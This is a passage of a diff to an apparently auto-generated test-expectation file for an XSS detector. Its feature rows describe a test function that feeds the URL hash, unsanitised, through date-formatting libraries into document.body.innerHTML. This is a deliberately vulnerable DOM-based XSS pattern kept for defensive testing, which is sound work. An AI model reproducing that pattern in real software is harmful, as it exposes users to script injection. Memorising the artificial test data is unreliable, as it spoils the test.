innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:38:69:38:72 | date | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:38:69:38:72 | date | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:38:77:38:81 | taint | CalleeFlexibleAccessPath | luxon.formatByString | | autogenerated/Xss/DomBasedXss/dates.js:38:77:38:81 | taint | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/dates.js:38:77:38:81 | taint | calleeImports | @date-io/luxon | @@ -13104,12 +97842,89 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:38:77:38:81 | taint | enclosingFunctionName | dateio | | autogenerated/Xss/DomBasedXss/dates.js:38:77:38:81 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:38:77:38:81 | taint | receiverName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:12 | document | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:12 | document | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:17 | document.body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:17 | document.body | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:27 | documen ... nerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:27 | documen ... nerHTML | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:86 | documen ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:86 | documen ... aint)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:86 | documen ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:86 | documen ... aint)}` | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:39:5:39:86 | documen ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:39:14:39:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:39:14:39:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:39:14:39:17 | body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:39:14:39:17 | body | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:39:14:39:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:39:19:39:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:39:19:39:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:39:19:39:27 | innerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:39:19:39:27 | innerHTML | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:39:19:39:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:39:31:39:86 | `Time i ... aint)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:39:31:39:86 | `Time i ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:39:31:39:86 | `Time i ... aint)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:39:31:39:86 | `Time i ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | | autogenerated/Xss/DomBasedXss/dates.js:39:31:39:86 | `Time i ... aint)}` | enclosingFunctionName | dateio | | autogenerated/Xss/DomBasedXss/dates.js:39:31:39:86 | `Time i ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:39:32:39:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:39:32:39:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:39:32:39:39 | Time is | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:39:32:39:39 | Time is | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:39:32:39:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:39:32:39:39 | Time is | stringConcatenatedWith | -endpoint- moment.formatByString() | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:47 | moment | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:47 | moment | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:47 | moment | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:47 | moment | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:47 | moment | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:62 | moment. ... yString | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:62 | moment. ... yString | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:62 | moment. ... yString | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:62 | moment. ... yString | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:62 | moment. ... yString | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:84 | exceptional return of moment. ... taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:84 | exceptional return of moment. ... taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:84 | exceptional return of moment. ... taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:84 | exceptional return of moment. ... taint) | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:84 | exceptional return of moment. ... taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:84 | moment. ... taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:84 | moment. ... taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:84 | moment. ... taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:84 | moment. ... taint) | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:84 | moment. ... taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:39:42:39:84 | moment. ... taint) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:39:49:39:62 | formatByString | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:39:49:39:62 | formatByString | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:39:49:39:62 | formatByString | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:39:49:39:62 | formatByString | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:39:49:39:62 | formatByString | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:39:64:39:69 | moment | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:39:64:39:69 | moment | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:39:64:39:69 | moment | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:39:64:39:69 | moment | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:39:64:39:69 | moment | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:39:64:39:74 | moment.date | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:39:64:39:74 | moment.date | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:39:64:39:74 | moment.date | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:39:64:39:74 | moment.date | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:39:64:39:74 | moment.date | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:39:64:39:76 | exceptional return of moment.date() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:39:64:39:76 | exceptional return of moment.date() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:39:64:39:76 | exceptional return of moment.date() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:39:64:39:76 | exceptional return of moment.date() | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:39:64:39:76 | exceptional return of moment.date() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:39:64:39:76 | moment.date() | CalleeFlexibleAccessPath | moment.formatByString | | autogenerated/Xss/DomBasedXss/dates.js:39:64:39:76 | moment.date() | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:39:64:39:76 | moment.date() | calleeImports | @date-io/moment | @@ -13119,6 +97934,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:39:64:39:76 | moment.date() | enclosingFunctionName | dateio | | autogenerated/Xss/DomBasedXss/dates.js:39:64:39:76 | moment.date() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:39:64:39:76 | moment.date() | receiverName | moment | +| autogenerated/Xss/DomBasedXss/dates.js:39:71:39:74 | date | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:39:71:39:74 | date | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:39:71:39:74 | date | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:39:71:39:74 | date | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:39:71:39:74 | date | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:39:79:39:83 | taint | CalleeFlexibleAccessPath | moment.formatByString | | autogenerated/Xss/DomBasedXss/dates.js:39:79:39:83 | taint | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/dates.js:39:79:39:83 | taint | calleeImports | @date-io/moment | @@ -13128,12 +97948,84 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:39:79:39:83 | taint | enclosingFunctionName | dateio | | autogenerated/Xss/DomBasedXss/dates.js:39:79:39:83 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:39:79:39:83 | taint | receiverName | moment | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:12 | document | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:12 | document | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:17 | document.body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:17 | document.body | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:27 | documen ... nerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:27 | documen ... nerHTML | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:84 | documen ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:84 | documen ... aint)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:84 | documen ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:84 | documen ... aint)}` | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:40:5:40:84 | documen ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:40:14:40:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:40:14:40:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:40:14:40:17 | body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:40:14:40:17 | body | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:40:14:40:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:40:19:40:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:40:19:40:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:40:19:40:27 | innerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:40:19:40:27 | innerHTML | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:40:19:40:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:40:31:40:84 | `Time i ... aint)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:40:31:40:84 | `Time i ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:40:31:40:84 | `Time i ... aint)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:40:31:40:84 | `Time i ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | | autogenerated/Xss/DomBasedXss/dates.js:40:31:40:84 | `Time i ... aint)}` | enclosingFunctionName | dateio | | autogenerated/Xss/DomBasedXss/dates.js:40:31:40:84 | `Time i ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:40:32:40:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:40:32:40:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:40:32:40:39 | Time is | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:40:32:40:39 | Time is | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:40:32:40:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:40:32:40:39 | Time is | stringConcatenatedWith | -endpoint- dayjs.formatByString() | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:46 | dayjs | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:46 | dayjs | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:46 | dayjs | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 dateFns DateFnsAdapter luxon LuxonAdapter moment MomentAdapter dayjs DayJSAdapter document body innerHTML Time is dateFns formatByString Date taint document body innerHTML Time is luxon formatByString luxon date taint document body innerHTML Time is moment formatByString moment date taint document body innerHTML Time is dayjs formatByString dayjs date taint | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:46 | dayjs | enclosingFunctionName | dateio | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:46 | dayjs | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:61 | dayjs.formatByString | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:40:42:40:61 | dayjs.formatByString | contextSurroundingFunctionParameters | () | +| 